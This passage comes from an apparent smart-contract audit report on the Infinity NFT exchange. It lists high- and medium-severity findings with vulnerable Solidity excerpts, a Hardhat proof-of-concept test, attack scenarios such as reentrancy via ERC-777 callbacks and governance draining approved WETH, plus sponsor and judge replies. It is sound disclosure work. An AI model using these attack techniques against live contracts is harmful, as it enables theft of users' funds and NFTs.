    if (isMakerSeller && currency == address(0)) {
      require(msg.value >= totalPrice, 'invalid total price');


    // check to ensure that for ETH orders, enough ETH is sent
    // for non ETH orders, IERC20 safeTransferFrom will throw error if insufficient amount is sent
    if (isMakerSeller && currency == address(0)) {
      require(msg.value >= totalPrice, 'invalid total price');

However, neither of these functions refunds the user in the case of overpayment. Instead, overpayment amounts will accrue in the contract balance.

Moreover, since there is a bug in rescueETH that prevents ether withdrawals from InfinityExchange, these overpayments will be locked permanently: the owner cannot withdraw and refund overpayments manually.


  • Alice creates a sell order for her token with constraints that set up a reverse Dutch auction: start price 500, end price 2000, start time 1, end time 5.
  • Bob fills the order at time 2. The calculated price is 875. Bob is unsure when his transaction will be included, so provides a full 2000 wei payment.
  • Bob’s transaction is included at time 3. The calculated price is 1250.
  • Bob’s additional 750 wei are locked in the contract and not refunded.

Suggestion: Calculate and refund overpayment amounts to callers.

nneverlander (Infinity) confirmed and resolved:

Agree with the assessment, fixed in

HardlyDifficult (judge) commented:

In the case of a Dutch auction, precise pricing is unknown at the time a tx is broadcasted. This leads to users overpaying and the surplus is taken as exchange fees instead of being refunded.

Accepting as a High risk submission.

[H-09] Calling unstake() can cause locked funds

Submitted by Ruhum, also found by 0xDjango, auditor0517, dipp, GimelSec, GreyArt, p4st13r4, and wagmi

Following scenario:

Alice has staked X token for 6 months that have vested. She stakes Y tokens for another three months. If she now calls unstake(X) to take out the tokens that have vested, the Y tokens she staked for three months will be locked up.

Proof of Concept

First, here’s a test showcasing the issue:

  describe('should cause trouble', () => {
    it('should lock up funds', async function () {
      await approveERC20(signer1.address, token.address, amountStaked, signer1, infinityStaker.address);
      await infinityStaker.connect(signer1).stake(amountStaked, 2);
      await network.provider.send("evm_increaseTime", [181 * DAY]);
      await network.provider.send('evm_mine', []);
      // The funds we staked for 6 months have vested
      expect(await infinityStaker.getUserTotalVested(signer1.address)).to.eq(amountStaked);

      // Now we want to stake funds for three months
      await approveERC20(signer1.address, token.address, amountStaked2, signer1, infinityStaker.address);
      await infinityStaker.connect(signer1).stake(amountStaked2, 1);

      // total staked is now the funds staked for three & six months
      // total vested stays the same
      expect(await infinityStaker.getUserTotalStaked(signer1.address)).to.eq(amountStaked.add(amountStaked2));
      expect(await infinityStaker.getUserTotalVested(signer1.address)).to.eq(amountStaked);

      // we unstake the funds that are already vested.
      const userBalanceBefore = await token.balanceOf(signer1.address);
      await infinityStaker.connect(signer1).unstake(amountStaked);
      const userBalanceAfter = await token.balanceOf(signer1.address);


      expect(await infinityStaker.getUserTotalStaked(signer1.address)).to.eq(ethers.BigNumber.from(0));
      expect(await infinityStaker.getUserTotalVested(signer1.address)).to.eq(ethers.BigNumber.from(0));

The test implements the scenario I’ve described above. In the end, the user got back their amountStaked tokens with the amountStaked2 tokens being locked up in the contract. The user has no tokens staked at the end.

The issue is in the _updateUserStakedAmounts() function:

    if (amount > noVesting) {
      userstakedAmounts[user][Duration.NONE].amount = 0;
      userstakedAmounts[user][Duration.NONE].timestamp = 0;
      amount = amount - noVesting;
      if (amount > vestedThreeMonths) {
        // MAIN ISSUE:
        // here `vestedThreeMonths` is 0. The current staked tokens are set to `0` and `amount` is decreased by `0`.
        // Since `vestedThreeMonths` is `0` we shouldn't decrease `userstakedAmounts` at all here.
        userstakedAmounts[user][Duration.THREE_MONTHS].amount = 0;
        userstakedAmounts[user][Duration.THREE_MONTHS].timestamp = 0;
        amount = amount - vestedThreeMonths;
        // `amount == vestedSixMonths` so we enter the else block
        if (amount > vestedSixMonths) {
          userstakedAmounts[user][Duration.SIX_MONTHS].amount = 0;
          userstakedAmounts[user][Duration.SIX_MONTHS].timestamp = 0;
          amount = amount - vestedSixMonths;
          if (amount > vestedTwelveMonths) {
            userstakedAmounts[user][Duration.TWELVE_MONTHS].amount = 0;
            userstakedAmounts[user][Duration.TWELVE_MONTHS].timestamp = 0;
          } else {
            userstakedAmounts[user][Duration.TWELVE_MONTHS].amount -= amount;
        } else {
          // the staked amount is set to `0`.
          userstakedAmounts[user][Duration.SIX_MONTHS].amount -= amount;
      } else {
        userstakedAmounts[user][Duration.THREE_MONTHS].amount -= amount;
    } else {
      userstakedAmounts[user][Duration.NONE].amount -= amount;

Don’t set userstakedAmounts.amount to 0 if none of its tokens are removed (vestedAmount == 0)

nneverlander (Infinity) confirmed

HardlyDifficult (judge) commented:

When unstaking, unvested tokens may become locked in the contract forever.

Accepting this as a High risk issue.

[H-10] Sellers may lose NFTs when orders are matched with matchOrders()

Submitted by KIntern, also found by csanuragjain, GimelSec, kenzo, and unforgiven

Function matchOrders uses custom constraints to make the matching more flexible, allow seller/buyer to specify maximum/minimum number of NFTs they want to sell/buy. This function first does some checks and then execute matching.

But in function areNumItemsValid(), there is a wrong checking will lead to wrong logic in matchOrders() function.

Instead of checking if numConstructedItems <= sell.constraints[0] or not, function areNumItemsValid() check if buy.constraints[0] <= sell.constraints[0]. It will lead to the scenario that numConstructedItems > sell.constraints[0] and make the seller sell more number of nfts than he/she allow.

Proof of Concept

Consider the scenario

  1. Alice create a sell order to sell maximum 2 in her 3 BAYC with ids [1, 2, 3]
  2. Bob create a buy order to buy mimimum any 2 BAYC with id in list [1, 2, 3]
  3. Match executor call matchOrders() to match Alice’s order and Bob’s one with parameter constructs = [1, 2, 3]
  4. Function matchOrders will transfer all NFT in construct list (3 NFTs 1, 2, 3) from seller to buyer even though seller only want to sell maximum 2 NFTs.

For more information, please check this PoC.

Tools Used

Hardhat, Chai

Replace check buy.constraints[0] <= sell.constraints[0] with numConstructedItems <= sell.constraints[0]

nneverlander (Infinity) confirmed

HardlyDifficult (judge) commented:

Seller’s may specify a max number of NFTs to sell, but in the scenario outlined by the warden that requirement is not enforced - leading to the sale of more NFTs than authorized.

Accepting this as a High risk report.

[H-11] Reentrancy from matchOneToManyOrders

Submitted by kenzo, also found by 0xDjango

Vulnerability Details

matchOneToManyOrders doesn’t conform to Checks-Effects-Interactions pattern, and updates the maker order nonce only after the NFTs and payment have been sent. Using this, a malicious user can re-enter the contract and re-fulfill the order using takeOrders.


Orders can be executed twice. User funds would be lost.

Proof of Concept

matchOneToManyOrders will set the order nonce as used only after the tokens are being sent:

  function matchOneToManyOrders(OrderTypes.MakerOrder calldata makerOrder, OrderTypes.MakerOrder[] calldata manyMakerOrders) external {
    if (makerOrder.isSellOrder) {
      for (uint256 i = 0; i < ordersLength; ) {
        _matchOneMakerSellToManyMakerBuys(...); // @audit will transfer tokens in here
      //@audit setting nonce to be used only here
      isUserOrderNonceExecutedOrCancelled[makerOrder.signer][makerOrder.constraints[5]] = true;
    } else {
      for (uint256 i = 0; i < ordersLength; ) {
        protocolFee += _matchOneMakerBuyToManyMakerSells(...); // @audit will transfer tokens in here
      //@audit setting nonce to be used only here
      isUserOrderNonceExecutedOrCancelled[makerOrder.signer][makerOrder.constraints[5]] = true;

So we can see that tokens are being transferred before nonce is being set to executed.

Therefore, POC for an attack - Alice wants to buy 2 unspecified WolfNFT, and she will pay via AMP, an ERC-777 token. Malicious user Bob will set up an offer to sell 2 WolfNFT. The MATCH_EXECUTOR will match the offers. Bob will set up a contract such that upon receiving of AMP, it will call takeOrders with Alice’s order, and 2 other WolfNFTs. (Note that although takeOrders is nonReentrant, matchOneToManyOrders is not, and so the reentrancy will succeed.)

So in takeOrders, the contract will match Alice’s order with Bob’s NFTs, and then set Alice’s order’s nonce to true, then matchOneToManyOrders execution will resume, and again will set Alice’s order’s nonce to true.

Alice ended up buying 4 WolfNFTs although she only signed an order for 2. Tough luck, Alice.

(Note: a similar attack can be constructed via ERC721’s onERC721Received.)

Conform to CEI and set the nonce to true before executing external calls.

nneverlander (Infinity) confirmed and resolved:

Fixed in:

HardlyDifficult (judge) commented:

Great catch! Agree with the assessment.

Medium Risk Findings (9)

[M-01] InfinityExchange computes gas refunds in a way where the first order’s buyer pays less than the later ones

Submitted by Ruhum, also found by 0xf15ers, 0xsanson, antonttc, kenzo, and WatchPug


The way the gas refunds are computed in the InfinityExchange contract, the first orders pay less than the latter ones. This causes a loss of funds for the buyers whose orders came last in the batch.

Proof of Concept

The issue is that the startGasPerOrder variable is computed within the for-loop. That causes the first iterations to be lower than later ones.

Here’s an example for the following line: To make the math easy we use the following values:

startGas = 1,000,000
gasPerOrder = 100,000 (so fulfilling an order costs us 100,000 gas)
ordersLength = 10

For the 2nd order we then get:

startGasPerOrder = 900,000 + ((1,000,000 + 20,000 - 900,000) / 10)
startGasPerOrder = 912,000

For the 9th order we get:

startGasPerOrder = 200,000 + ((1,000,000 + 20,000 - 200,000) / 10)
startGasPerOrder = 282,000

The startGasPerOrder variable is passed through a couple of functions without any modification until it reaches a line like this:

uint256 gasCost = (startGasPerOrder - gasleft() + wethTransferGasUnits) * tx.gasprice;

There, the actual gas costs for the user are computed.

In our case, that would be:

# 2nd order
# gasleft() is 800,00 because we said that executing the order costs ~100,000 gas. At the beginning of the order, it was 900,000 so now it's 800,000. This makes the computation a little more straightforward although it's not 100% correct.
gasCost = (912,000 - 800,000 + 50,000) * 1
gasCost = 162,000

# 9th order
gasCost = (282,000 - 100,000 + 50,000) * 1
gasCost = 232,000

So the 2nd order’s buyer pays 162,000 while the 9th order’s buyer pays 232,000.

As I said the math was dumbed down a bit to make it easier. The actual difference might not be as big as shown here. But, there is a difference.

The startGasPerOrder variable should be initialized outside the for-loop.

nneverlander (Infinity) confirmed and resolved:

Fixed in

Agree with risk assessment.

HardlyDifficult (judge) decreased severity to Medium and commented:

When multiple orders are processed in batch, some users pay more than their expected share of gas costs.

Although the impact may be relatively small values, this appears to be a common path and would result in taking more value than expected from many users during normal usage. Rating this a Medium risk issue as it leaks value impacting users who are not first in a batch transaction.

[M-02] Maker order buyer is forced to reimburse the gas cost at any tx.gasprice

Submitted by WatchPug, also found by 0xsanson, and shenwilly

uint256 gasCost = (startGasPerOrder - gasleft() + wethTransferGasUnits) * tx.gasprice;
// if the execution currency is weth, we can send the protocol fee and gas cost in one transfer to save gas
// else we need to send the protocol fee separately in the execution currency
if (buy.execParams[1] == weth) {
  IERC20(weth).safeTransferFrom(buy.signer, address(this), protocolFee + gasCost);
} else {
  IERC20(buy.execParams[1]).safeTransferFrom(buy.signer, address(this), protocolFee);
  IERC20(weth).safeTransferFrom(buy.signer, address(this), gasCost);

In the current design/implementation, while the order is executed by the MATCH_EXECUTOR, the gas cost will always be paid by the maker order’s buyer.

While the buyer did agreed to pay a certain price for certain NFTs, the actual cost for that maker buy order is unpredictable: because the MATCH_EXECUTOR can choose to execute the order while the network is extremly busy and the gas price is skyhigh.

As the gas cost at whatever gas price will be reimbursed by the buyer, the executor has no incentive to optimize and choose to execute the order at a lower gas cost.

The result is the buyer can sometimes end up paying much higher total price (incl. gas cost) for the items they bought.


While this is more of a design issue than a wrong implementation, the impact can be very severe for some users, and can cause defacto fund loss to the users who have they maker buy orders matched at a high gas price transactions.


Consider adding a new paramer to maker buy orders, maxGasCost to allow the buyer to limit the max gas they agreed to pay.

nneverlander (Infinity) acknowledged, but disagreed with severity and commented:

We have considered this issue and decided to handle it offchain. The offchain matching engine does not send txns if gas costs are high by default. While this involves some trust, we wanted to simplify the UX for users.

In any case, it is trivial for us to add the max gas preference setting offchain on the UI and the matching engine will respect that.

We can consider adding this preference to the orderType itself in a future implementation.

As such, the bug can be classified as low risk but I leave it up to more experienced judges.

HardlyDifficult (judge) decreased severity to Medium and commented:

Thank you for the detailed response here @nneverlander!

Due to the gas refund logic highlighted by the warden here, users could end up spending their entire balance (or amount approved) unexpectedly. I understand that this could be handled with off chain logic but a bug in that system could have significant impact on users. Since it is just a single trusted actor that could cause damage here - I believe this is a Medium risk issue due to the “external requirements” such as a bug in the off chain matcher.

[M-03] Protocol fee rate can be arbitrarily modified by the owner and the new rate will apply to all existing orders

Submitted by WatchPug, also found by berndartmueller, BowTiedWardens, cccz, csanuragjain, defsec, GreyArt, joestakey, m9800, peritoflores, reassor, Ruhum, shenwilly, throttle, and zer0dot

function matchOneToOneOrders(
    OrderTypes.MakerOrder[] calldata makerOrders1,
    OrderTypes.MakerOrder[] calldata makerOrders2
  ) external {
    uint256 startGas = gasleft();
    uint256 numMakerOrders = makerOrders1.length;
    require(msg.sender == MATCH_EXECUTOR, 'OME');
    require(numMakerOrders == makerOrders2.length, 'mismatched lengths');

    // the below 3 variables are copied to memory once to save on gas
    // an SLOAD costs minimum 100 gas where an MLOAD only costs minimum 3 gas
    // since these values won't change during function execution, we can save on gas by copying them to memory once
    // instead of SLOADing once for each loop iteration
    uint16 protocolFeeBps = PROTOCOL_FEE_BPS;
    uint32 wethTransferGasUnits = WETH_TRANSFER_GAS_UNITS;

Per the comment:

Transfer fees. Fees are always transferred from buyer to the seller and the exchange although seller is the one that actually ‘pays’ the fees

And the code:

    uint256 protocolFee = (protocolFeeBps * execPrice) / 10000;
    uint256 remainingAmount = execPrice - protocolFee;
    _transferMultipleNFTs(sell.signer, buy.signer, sell.nfts);
    // transfer final amount (post-fees) to seller
    IERC20(buy.execParams[1]).safeTransferFrom(buy.signer, sell.signer, remainingAmount);

In the current design/implementation, the protocol fee is paid from the buyer’s wallet, regardless of whether the buyer is the taker or the maker. And the protocol fee will be deducted from the execPrice, only the remainingAmount will be sent to the seller.

This is unconventional as if the buyer placed a limit order, say to sell 1 Punk for 100 ETH, it means that the seller is expected to receive 100 ETH. And now the seller must consider the fee rate and if they expect 100 ETH, the price must be set to 101 ETH.

While this is unconventional and a little inconvenience, it’s still acceptable IF the protocol fee rate is fixed, OR the seller is the taker so that they can do the math and agrees to the protocol fee when they choose to fulfill the counterparty’s maker order.

However, that’s not always the case with the current implementation: the protocol can be changed, effective immediately, and applies to all existing orders.

    /// @dev updates exchange fees
  function setProtocolFee(uint16 _protocolFeeBps) external onlyOwner {
    PROTOCOL_FEE_BPS = _protocolFeeBps;
    emit NewProtocolFee(_protocolFeeBps);

Plus, when the protocol fee rate updated to a higher rate, say from 5% to 50%, an maker order placed before this fee rate update can be fulfilled by a buyer, while the buyer still pays the same amount, the seller (maker) will receive 45% less than the initial sell order amount.


  1. Consider making the protocol fee rate a constant, ie, can not be changed;
  2. Or, consider changing to the protocol fee always be paid by the taker; while matching the maker buy and maker sell orders, the protocol fee must be paid from the price difference between the buy price and sell price;
  3. Or, consider changing to the new protocol fee only applies to the orders created after the rate updated.

nneverlander (Infinity) acknowledged, but disagreed with severity and commented:

This was a design decision. Initially we were fetching the protocol fee from the complication but decided not to make external contract calls for this to save on gas. The other option was to make the protocol fee a part of the maker order but that comes with its own attack surface. So we implemented a compromise:

As such the severity of the bug can be classified as low since this assumes malicious intent on part of the protocol admin.

HardlyDifficult (judge) decreased severity to Medium and commented:

Maker sell orders are charged the fee set at the time an order is filled and not when the order was created.

I’m not sure that I agree this concern is limited to malicious intent. With the ability to change fee, it’s safe to assume at some point the admin may choose to increase the fee. At that point, all outstanding maker sells are subject to a higher fee than expected. Some users may be more sensitive to this than others. The warden’s recommendations seems to address that concern and the fix the sponsor posted mitigates it by setting a max fee that may apply.

I think this is a Medium risk issue - an unexpected bump in fee impacting users who interacted with the system previous to that change is a form of value leak.

[M-04] Fund loss or griefing in all order matching functions [matchOneToOneOrders(), matchOneToManyOrders(), matchOrders(), takeMultipleOneOrders(), takeOrders()] because condition (seller != buyer ) is not checked in any of them

Submitted by unforgiven, also found by GreyArt

Functions matchOneToOneOrders(), matchOneToManyOrders(), matchOrders(), takeMultipleOneOrders(), takeOrders() are for order matching and order execution and they validate different things about orders but there is no check for that seller != buyer, which can cause wrong order matching resulting in fund lose or fund theft or griefing. (it can be combined with other vulns to perform more damaging attacks)

Proof of Concept

We only give proof of concept for matchOneToManyOrders() and other order execution/matching functions has similar bugs which root cause is not checking seller != buyer. This is matchOneToManyOrders() code:

   @notice Matches one  order to many orders. Example: A buy order with 5 specific NFTs with 5 sell orders with those specific NFTs.
   @dev Can only be called by the match executor. Refunds gas cost incurred by the
        match executor to this contract. Checks whether the given complication can execute the match.
   @param makerOrder The one order to match
   @param manyMakerOrders Array of multiple orders to match the one order against
  function matchOneToManyOrders(
    OrderTypes.MakerOrder calldata makerOrder,
    OrderTypes.MakerOrder[] calldata manyMakerOrders
  ) external {
    uint256 startGas = gasleft();
    require(msg.sender == MATCH_EXECUTOR, 'OME');
    require(_complications.contains(makerOrder.execParams[0]), 'invalid complication');
      IComplication(makerOrder.execParams[0]).canExecMatchOneToMany(makerOrder, manyMakerOrders),
      'cannot execute'
    bytes32 makerOrderHash = _hash(makerOrder);
    require(isOrderValid(makerOrder, makerOrderHash), 'invalid maker order');
    uint256 ordersLength = manyMakerOrders.length;
    // the below 3 variables are copied to memory once to save on gas
    // an SLOAD costs minimum 100 gas where an MLOAD only costs minimum 3 gas
    // since these values won't change during function execution, we can save on gas by copying them to memory once
    // instead of SLOADing once for each loop iteration
    uint16 protocolFeeBps = PROTOCOL_FEE_BPS;
    uint32 wethTransferGasUnits = WETH_TRANSFER_GAS_UNITS;
    address weth = WETH;
    if (makerOrder.isSellOrder) {
      for (uint256 i = 0; i < ordersLength; ) {
        // 20000 for the SSTORE op that updates maker nonce status from zero to a non zero status
        uint256 startGasPerOrder = gasleft() + ((startGas + 20000 - gasleft()) / ordersLength);
        unchecked {
      isUserOrderNonceExecutedOrCancelled[makerOrder.signer][makerOrder.constraints[5]] = true;
    } else {
      uint256 protocolFee;
      for (uint256 i = 0; i < ordersLength; ) {
        protocolFee += _matchOneMakerBuyToManyMakerSells(
        unchecked {
      isUserOrderNonceExecutedOrCancelled[makerOrder.signer][makerOrder.constraints[5]] = true;
      uint256 gasCost = (startGas - gasleft() + WETH_TRANSFER_GAS_UNITS) * tx.gasprice;
      // if the execution currency is weth, we can send the protocol fee and gas cost in one transfer to save gas
      // else we need to send the protocol fee separately in the execution currency
      // since the buyer is common across many sell orders, this part can be executed outside the above for loop
      // in contrast to the case where if the one order is a sell order, we need to do this in each for loop
      if (makerOrder.execParams[1] == weth) {
        IERC20(weth).safeTransferFrom(makerOrder.signer, address(this), protocolFee + gasCost);
      } else {
        IERC20(makerOrder.execParams[1]).safeTransferFrom(makerOrder.signer, address(this), protocolFee);
        IERC20(weth).safeTransferFrom(makerOrder.signer, address(this), gasCost);

in its executions it calls InfinityOrderBookComplication.canExecMatchOneToMany(), verifyMatchOneToManyOrders(), isOrderValid() to see that if orders are valid and one order matched to all other orders but there is no check for seller != buyer in any of those functions. and also ERC721 and ERC20 allows funds and assets to be transferred from address to itself. So it’s possible for matchOneToManyOrders() to match one user sell orders to its buy orders which can cause fund theft or griefing. This is the scenario for fund lose in matchOneToManyOrders():

  1. Let’s assume orders NFT ids are for one collection for simplicity.
  2. NFT ID[1] fair price is 8 ETH and NFT ID[2] fair price is 2 ETH.
  3. user1 wants to buy NFT IDs[1,2] at 10 ETH (both of them) so he create one buy order and signs it.
  4. user1 wants to sell NFT ID[1] at 2.5 ETH and sell NFT ID[2] at 8.5 ETH. and he wants to sell them immediately after buying them so he create this two sell orders and sign them.
  5. attacker who has NFT ID[1] creates an sell order for it at 7.5 ETH and signs it.
  6. Off-chain machining engine sends this orders to matchOneToManyOrders(): many orders = [(attacker sell ID[1] at 7.5 ETH) , (user1 sell ID[1] at 2.5 ETH)] , one order = (user1 buy IDs[1,2] at 10ETH)
  7. Function matchOneToManyOrders() logic will check orders and their matching and all the checks would be passed for matching one order to many order(becase tokens lists intersects and numTokens are valids too (1+1=2))
  8. Function matchOneToManyOrders() would execute order and transfer funds and tokens which would result in: (transferring 7.5 ETH from user 1 to attacker) (transferring 2.5 ETH from user1 to user1) (transferring NFT ID[1] from attacker to user1) (transferring NFT ID[1] from user1 to user1)
  9. So in the end contract executed user1 buy order (user1 buy IDs[1,2] at 10ETH) but user only received NFT ID[1] and didn’t received NFT ID[2] so contract code perform operation contradiction to what user1 has been signed.

Of course for this attack to work for matchOneToManyOrders() off-chain matching engine need to send wrong data but checks on the contract are not enough.

There are other scenarios for other functions that can cause griefing, for example for function matchOrders(): a user can have multiple order to buy some tokens in list of ids. it’s possible to match these old orders:

  1. user1 has this order: A:(user1 BUY 1 of IDs[1,2,3]) and B:(user1 BUY 1 of IDs[1,4,5])
  2. then the order B get executed for ID[1] and user1 become the owner of ID[1]
  3. user1 wants to sell some of his tokens so he signs this order: C::(user1 SELL 1 of IDs[1,6,7])
  4. matching engine would send order A and C with constructedNfts=ID[1] to matchOrders().
  5. matchOrders() would check conditions and would see that conditions are met and perform the transaction.
  6. user1 would pay some unnecessary order fee and it would become like griefing and DOS attack for him.

There may be other scenarios for this vulnerability to be harmful for users.

Tools Used


Add some checks to ensure that seller != buyer

nneverlander (Infinity) confirmed and resolved:

Agree with assessment. Fixed in:

HardlyDifficult (judge) decreased severity to Medium and commented:

This is an interesting scenario where a buyer looking to flip immediately could have their order under filled.

Given the specifics of this scenario where the user needs to sign both a buy and a sell with the same NFTs, I’m inclined to rate this a Medium risk issue.

[M-05] ETH mistakenly sent over with ERC20 based takeOrders and takeMultipleOneOrders calls will be lost

Submitted by obtarian, also found by 0xsanson, cccz, and VAD37

Vulnerability details

takeOrders() and takeMultipleOneOrders() are the main user facing functionality of the protocol. Both require currency to be fixed for the call and can have it either as a ERC20 token or ETH. This way, the probability of a user sending over a ETH with the call whose currency is a ERC20 token isn’t negligible. However, in this case ETH funds of a user will be permanently lost.

Setting the severity to medium as this is permanent fund freeze scenario conditional on a user mistake, which probability can be deemed high enough as the same functions are used for ETH and ERC20 orders.

Proof of Concept

Both takeOrders() and takeMultipleOneOrders() only check that ETH funds are enough to cover the order’s totalPrice:

    // check to ensure that for ETH orders, enough ETH is sent
    // for non ETH orders, IERC20 safeTransferFrom will throw error if insufficient amount is sent
    if (isMakerSeller && currency == address(0)) {
      require(msg.value >= totalPrice, 'invalid total price');

    // check to ensure that for ETH orders, enough ETH is sent
    // for non ETH orders, IERC20 safeTransferFrom will throw error if insufficient amount is sent
    if (isMakerSeller && currency == address(0)) {
      require(msg.value >= totalPrice, 'invalid total price');

When currency is some ERC20 token, while msg.value > 0, the msg.value will be permanently frozen within the contract.

Consider adding the check for msg.value to be zero for the cases when it is not utilized:

    // check to ensure that for ETH orders, enough ETH is sent
    // for non ETH orders, IERC20 safeTransferFrom will throw error if insufficient amount is sent
    if (isMakerSeller && currency == address(0)) {
      require(msg.value >= totalPrice, 'invalid total price');
    } else {
      require(msg.value == 0, 'non-zero ETH value');

nneverlander (Infinity) confirmed

HardlyDifficult (judge) commented:

When accepting an order using ERC20 tokens, any ETH included will be accepted as exchange fees instead of reverting the tx or refunding to the user.

This is a result of user error, but leads to a direct loss of funds. Accepting as a Medium risk submission.

[M-06] Bug in MatchOneToManyOrders may cause tokens theft

Submitted by PwnedNoMore

The MatchOneToManyOrders does not check whether a given sell order is malicious, i.e., containing no NFT tokens but still requiring payment.

This may cause the sellers to maliciously profit.

For example, we have a buyOrder and a set of sell orders [sellOrder0, sellOrder1, sellOrder2]. Originally, they match well but with a legal price gas (which is common in the real world), i.e., MatchOneToManyOrders(buyOrder, [sellOrder0, sellOrder1, sellOrder2]) can be successfully processed.

However, If the hacker proposes another sellOrder3 which sells nothing but requests money/tokens. The MatchOneToManyOrders(buyOrder, [sellOrder0, sellOrder1, sellOrder2, sellOrder3]) will also succeed and the hacker does not need to send out any NFT token but grabs a considerable gain.

Attack Scenario

There are two possible attack scenarios.

The MATCH_EXECUTOR is not in a good faith

MATCH_EXECUTOR can always gain profit by leveraging this vulnerability. That is, every time the executor proposes a MatchOneToManyOrders, it can add one more EMPTY order to gain the profit.

It is one kind of centralization issue. All the processes should happen in a trust-less environment.

Hackers can brute force the price gaps by sending out a large amount of EMPTY sell orders

Note that creating an order happens off-chain. That means, the hacker can send out a large amount of EMPTY orders without paying any gas fee.

Once the executor picks any of the malicious orders, the hacker can gain the profit without a loss of NFT tokens.

This vulnerability also affects matchOrders.

Proof of Concept

For full details, see original submission.

To mitigate the issue entirely, I would suggest banning any empty NFT transfers.

For example, numNfts must be bigger than zero here. Also make sure the ERC1155 transferring at least 1 item.

nneverlander (Infinity) acknowledged and commented:

Please check this:

No more ERC1155 either.

The loop that transfers NFTs already checks for non empty array

Not sure of the assessment.

HardlyDifficult (judge) decreased severity to Medium and commented:

This is a great report, appreciate the detail and the PoC code.

Given that the call must originate from the match executor, it seems unlikely that it would match with an empty sell order. Additionally it should be easy to filter these when submitted off-chain. With that in mind, lowering this to a Medium risk issue.

[M-07] Malicious governance can use updateWethTranferGas to steal WETH from buyers

Submitted by shenwilly, also found by 0x29A, berndartmueller, BowTiedWardens, peritoflores, and VAD37

Vulnerability Details

A malicious or compromised governance can set the transfer gas cost to an unreasonable amount and steal approved WETH from buyers.

There are two ways for governance to exploit this:

  • When an order is being executed, governance can frontrun the transactions by setting WETH_TRANSFER_GAS_UNITS to a very high amount.
  • Set WETH_TRANSFER_GAS_UNITS to a very high amount, and execute trades against active buy orders. As long as the value of WETH to steal is higher than the cost to prepare the NFTs to sell, it is profitable to do so.

Proof of Concept

  • WETH_TRANSFER_GAS_UNITS is set to 50000.
  • Alice has 100 WETH and 100 USDC. She approved infinite allowance to InfinityExchange.
  • Alice signs a buy order to buy a FakePunk NFT with 100 USDC price.
  • Malicious governance sets WETH_TRANSFER_GAS_UNITS to a very high amount such that the gasCost calculation equals 100 WETH.
  • Governance then bought a FakePunk in open market, and fills Alice’s order.
  • Alice received the NFT but paid 100 WETH as gas cost.

Set a sanity check in updateWethTranferGas so governance can’t set it to unreasonable value. Consider using timelock for setting governance settings.

function updateWethTranferGas(uint32 _wethTransferGasUnits) external onlyOwner {
    require(_wethTransferGasUnits <= 100000, "gas unit must not be higher than 100000");
    WETH_TRANSFER_GAS_UNITS = _wethTransferGasUnits;
    emit NewWethTransferGasUnits(_wethTransferGasUnits);

nneverlander (Infinity) acknowledged, but disagreed with severity

HardlyDifficult (judge) commented:

When a transaction is sent by the matching engine, the user pays for the gas costs of their portion of that call. There’s overhead in actually getting the money from the user in WETH, which is estimated with WETHTRANSFERGAS_UNITS. That value is currently uncapped so the admin could increase it significantly, impacting users who signed orders back when that value was more reasonably assigned.

Agree with Medium risk here.

[M-08] Incorrect condition marks valid order as invalid

Submitted by csanuragjain, also found by KIntern

canExecMatchOrder is having an incorrect check which makes a valid order as invalid.

doItemsIntersect function is also checked on sell.nfts, buy.nfts which is incorrect.

doItemsIntersect should only be checked in reference to constructedNfts.

Proof of Concept

  1. Assume buy has nfts {A,B,C}, sell has nft {A,B}, constructedNfts has nft {A}, buy.constraints[0]/sell.constraints[0]/numConstructedItems is 1
  2. Ideally this order should match since constructedNfts {A} is present in both buy and sell
  3. But this will not match since doItemsIntersect(sell.nfts, buy.nfts) will fail because of item C which is not present in sell

Remove doItemsIntersect(sell.nfts, buy.nfts) from InfinityOrderBookComplication.sol#L140

nneverlander (Infinity) confirmed and resolved:

Fixed in

HardlyDifficult (judge) decreased severity to Medium and commented:

Some orders that should be matched would revert. Lowering this to Medium risk.

[M-09] Malicious tokens can be used to grief buyers and cause loss of their WETH balance

Submitted by 0xalpharush


The function matchOneToOneOrders transfers an arbitrary amount of WETH from the user, buy.signer , in its inner call to _execMatchOneToOneOrders. The amount charged to the user is calculated dynamically based off of the gas consumption consumed during the trace. Notably, this amount is controlled by the seller since the seller’s token can be malicious and purposefully consume a large amount of gas to grief the buyer. For example, when a user purchases an ERC721 token, the _transferNFTs will result in a call to an ERC721.safeTransferFrom that can exhibit any behavior such as wasting gas. This scenario is unlikely given that a buyer would have to purchase a malicious token, but the impact would be devastating as any WETH that the buyer has approved to the exchange can be lost.

This vulnerability is potentially possible in these functions as well:

Proof of Concept

A buyer gives infinite WETH approval to the exchange contract and unknowingly purchases a malicious token from an attacker. The attacker’s token wastes gas in the transfer call and causes all of the buyer’s WETH to be sent to the protocol when matchOneToOneOrders is performed by the match executor.

Allow users to input a maximum fee/ gas cost they are willing to spend on each order. Pulling an arbitrary amount from a user’s wallet without any restriction is a dangerous practice given that many users give large/ infinite approval to contracts.

In addition, manual gas accounting is error prone and it would make more sense to allow users to match orders themselves instead of extracting fees to compensate the matcher.

nneverlander (Infinity) acknowledged and commented:

Thanks, we are adding a max price variable

HardlyDifficult (judge) commented:

This is a clever way to leverage safeTransferFrom to grief users. Accepting as Medium risk.

Low Risk and Non-Critical Issues

For this contest, 78 reports were submitted by wardens detailing low risk and non-critical issues. The report highlighted below by joestakey received the top score from the judge.

The following wardens also submitted reports: IllIllI, 0x1f8b, reassor, zzzitron, 0x29A, GimelSec, BowTiedWardens, hyh, berndartmueller, oyc_109, cryptphi, VAD37, Kenshin, 0xNazgul, horsefacts, defsec, 0xDjango, StErMi, Ruhum, hansfriese, PPrieditis, 0xNineDec, MadWookie, robee, throttle, csanuragjain, Lambda, Treasure-Seeker, GreyArt, hake, samruna, unforgiven, sorrynotsorry, KIntern, Wayne, Czar102, peritoflores, sseefried, sach1r0, georgypetrov, antonttc, Kaiziron, cloudjunky, 0x52, Chom, _Adam, shenwilly, saian, codexploder, 0xkowloon, WatchPug, cccz, wagmi, apostle0x01, fatherOfBlocks, TomJ, 8olidity, TerrierLover, rfa, simon135, Cityscape, 0xmint, FSchmoede, delfin454000, k, rajatbeladiya, nxrblsrpr, Sm4rty, ElKu, asutorufos, Picodes, abhinavmir, Funen, kenta, MiloTruck, a12jmx, and 0xf15ers.

[L-01] Event should be emitted in setters

Setters should emit an event so that Dapps can detect important changes to storage.

Proof of Concept

Instances include:


All the functions editing the currencies and complications of the exchange should emit an event
function addCurrency
function addComplication
function removeCurrency
function removeComplication

function updateMatchExecutor


function updateStakeLevelThreshold
function updatePenalties
function updateInfinityTreasury


Emit an event in all setters.

[L-02] Check zero denominator

When a division is computed, it must be ensured that the denominator is non-zero to prevent failure of the function call.

